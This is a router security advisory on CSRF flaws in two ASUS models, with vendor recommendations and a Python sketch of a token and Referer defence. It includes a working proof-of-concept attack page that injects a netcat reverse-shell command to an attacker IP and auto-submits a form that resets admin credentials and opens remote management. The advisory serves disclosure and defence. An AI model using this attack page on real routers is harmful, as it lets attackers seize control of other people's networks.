Taking over the ASUS RT-N56U and RT-AC66U


  • The RT-N56U and RT-AC66U can be taken over by a remote adversary through a CSRF attack.

Note: The attacks described below affect both the RT-N56U and RT-AC66U, even though the description may only describe one of them.

Description

The ASUS RT-N56U router is susceptible to several CSRF attacks, which allow an attacker to forge HTML forms and execute actions on behalf of a legitimate user. ISE created a proof of concept that, when executed by an unsuspecting device administrator, changes the administrator credentials, enables remote management, and gives the attacker reverse-shell access to the router.

Attack Requirements

  • The victim must have an active management session with the RT-N56U router.
  • The victim must be fooled into performing an action (e.g., clicking an attacker-provided link), must browse to a malicious or compromised site, or must be the victim of a man-in-the-middle attack.

Details

  • All HTML forms present in the ASUS RT-N56U are susceptible to Cross-Site Request Forgery.
  • Vulnerable Firmware is 3.0.0.4.342 on the RT-N56U.
  • Vulnerable Firmware is 3.0.0.4.266 on the RT-AC66U.
  • Other versions of firmware were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control over the victim router.

Recommendations to the vendor

  • Cross-Site Request Forgery can be prevented by including an unpredictable token in each state-changing HTTP request submitted to the web server and rejecting any request that does not carry a valid one. At a minimum, these tokens should be unique to each user session; it is recommended that each HTML form delivered contain its own unique token.
  • In addition to HTML form tokens, HTTP "Referer" checking should be enabled. Treat it as a secondary control: some browsers and proxies strip the header, so the token check must remain the primary defence.
  • Additional information for vendors regarding immediate and long-term fixes for these issues can be found on our summary page here.
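As an added example, not ISE's code and not ASUS firmware, the following Python sketches how a router web server could implement the two recommendations above (a per-form, single-use token bound to the login session, plus Referer/Origin checking) and adds one rule the page does not list: state-changing requests are accepted only over POST, which by itself defeats the image-tag GET used in the proof of concept. It then replays the proof-of-concept requests against the check. The attacker hostname, the session identifier, the router UI page name and the in-memory token store are assumptions.

```python
"""Server-side CSRF defence for a router-style web UI (illustrative, not vendor code)."""
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

ROUTER_ORIGIN = "http://192.168.1.1"  # address used in the proof of concept

# Constructed in-memory token store: session id -> {token: form path it was issued for}.
# Real firmware would keep this next to its session table.
_issued: Dict[str, Dict[str, str]] = {}


def issue_csrf_token(session_id: str, form_path: str) -> str:
    """Mint an unpredictable token for one delivered form, bound to this session and form."""
    token = secrets.token_urlsafe(32)
    _issued.setdefault(session_id, {})[token] = form_path
    return token


def consume_csrf_token(session_id: str, form_path: str, token: Optional[str]) -> bool:
    """Accept a token once; replayed, guessed, foreign-session or wrong-form tokens fail."""
    if not token:
        return False
    bound_form = _issued.get(session_id, {}).pop(token, None)
    return bound_form == form_path


def same_origin(headers: Dict[str, str]) -> bool:
    """Origin (preferred) or Referer must name the router itself. A missing header is
    rejected: strict, and it trips proxies that strip Referer, which is why the token,
    not this check, is the primary control."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    p = urlsplit(src)
    return f"{p.scheme}://{p.netloc}" == ROUTER_ORIGIN


def authorize_state_change(req: dict, session_id: str) -> Tuple[bool, str]:
    """req = {"method", "path", "headers", "params"} of an authenticated request."""
    if req["method"] != "POST":
        return False, "state change via GET refused"
    if not same_origin(req["headers"]):
        return False, "missing or cross-origin Referer/Origin"
    if not consume_csrf_token(session_id, req["path"], req["params"].get("csrf_token")):
        return False, "missing, replayed or invalid CSRF token"
    return True, "ok"


def parse_get_request(url: str, headers: Dict[str, str]) -> dict:
    """Turn an <img src=...> URL into the request dict above ('+' decodes to a space)."""
    p = urlsplit(url)
    params = {k: v[0] for k, v in parse_qs(p.query, keep_blank_values=True).items()}
    return {"method": "GET", "path": p.path, "headers": headers, "params": params}


# --- Constructed requests modelled on the proof of concept ---------------------------
ATTACKER_PAGE = {"Referer": "http://attacker.example/asus.html"}  # hypothetical host

# The image-tag command injection: one GET whose Referer is the attacker's page.
POC_GET_URL = ("http://192.168.1.1/apply.cgi?current_page=Main_AdmStatus_Content.asp"
               "&next_page=Main_AdmStatus_Content.asp&action_mode=+Refresh+&action_script="
               "&action_wait=&first_time=&preferred_lang=EN"
               "&SystemCmd=nc+192.168.1.177+10000+-e+/bin/sh&action=Refresh")
poc_get = parse_get_request(POC_GET_URL, ATTACKER_PAGE)

# The auto-submitted form: a POST with the hidden fields, no token, foreign Referer.
poc_post = {"method": "POST", "path": "/start_apply.htm", "headers": ATTACKER_PAGE,
            "params": {"http_username": "admin", "http_passwd": "ISE", "http_passwd2": "ISE",
                       "telnetd_enable": "1", "misc_http_x": "1", "misc_httpport_x": "31337",
                       "action_mode": "apply"}}


def legitimate_post(token: str, headers: Optional[Dict[str, str]] = None) -> dict:
    """The same form submitted from the router's own UI (hypothetical page name) with a token."""
    if headers is None:
        headers = {"Referer": ROUTER_ORIGIN + "/Advanced_System_Content.asp"}
    return {"method": "POST", "path": "/start_apply.htm", "headers": headers,
            "params": {"misc_http_x": "0", "action_mode": "apply", "csrf_token": token}}


if __name__ == "__main__":
    sid = "session-of-logged-in-admin"  # constructed session identifier
    print(authorize_state_change(poc_get, sid))   # refused: GET
    print(authorize_state_change(poc_post, sid))  # refused: foreign Referer
    tok = issue_csrf_token(sid, "/start_apply.htm")
    print(authorize_state_change(legitimate_post(tok), sid))  # allowed
    print(authorize_state_change(legitimate_post(tok), sid))  # refused: replay
```

The ordering matters: the method and origin checks are cheap and reject the two proof-of-concept requests before any token is consumed, while a forged POST that somehow arrives with a router Referer still fails on the token, which the attacker's page cannot read across origins.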

Recommendations to device administrators

  • (4/13/2013) There is currently no firmware upgrade available that remedies this vulnerability.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

In the following proof-of-concept attack, we assume that an RT-N56U device administrator with an active management session established with the router has browsed to a malicious web page. Once there, requests are issued automatically from the administrator's browser to the administrator's router. Since the administrator has a current session established with the router, the requests are processed.

The attack page (Figure 1) first issues a GET to apply.cgi whose SystemCmd parameter starts a netcat reverse shell to the attacker's host, then auto-submits a form pre-filled with the values required to change the administrator credentials, enable Telnet, and enable remote management on port 31337.


<html>
<head>
<title> ASUS Multi Model CSRF</title>
<!-- Model: RT-N56U - Firmware Version: 3.0.0.4.342 -->
<!-- Model: RT-AC66U - Firmware Version: 3.0.0.4.266 -->

<!--
# Discovered and Exploited by Jacob Holcomb/Gimppy of 
    Independent Security Evaluators
# http://infosec42.blogspot.com
# https://www.ise.io
-->

</head>

<body>

<!--Execute System Commands -->
<img src="http://192.168.1.1/apply.cgi?current_page=Main_AdmStatus_Content.asp
	&next_page=Main_AdmStatus_Content.asp&action_mode=+Refresh+&action_script=
	&action_wait=&first_time=&preferred_lang=EN
	&SystemCmd=nc+192.168.1.177+10000+-e+/bin/sh&action=Refresh">

<!--Confirm System Command Exec -->
<img src="http://192.168.1.1/Main_AdmStatus_Content.asp">

<form name="ASUS" action="http://192.168.1.1/start_apply.htm" method="post">
<input type="hidden" name="http_username" value="admin"> <!-- Admin Username -->
<input type="hidden" name="http_passwd" value="ISE"> <!--Admin Password  -->
<input type="hidden" name="http_passwd2" value="ISE"> <!--Admin Password  -->
<input type="hidden" name="v_password2" value="ISE">
<input type="hidden" name="telnetd_enable" value="1"> <!--Enable Telnet-LAN Only-->
<input type="hidden" name="misc_http_x" value="1"> <!--Enable HTTP Remote MGMT -->
<input type="hidden" name="misc_httpport_x" value="31337"><!--HTTP Remote MGMT Port-->
<input type="hidden" name="action_mode" value="apply">
</form>

<script>
function CSRF1() {document.ASUS.submit();};
window.setTimeout(CSRF1,1000);
</script>

</body>
</html>

Figure 1. Attack page 1.

At this point, the attacker has a reverse shell on the device and can remotely administer, and thereby remotely control, the ASUS RT-N56U.

References

None.

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular ASUS hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io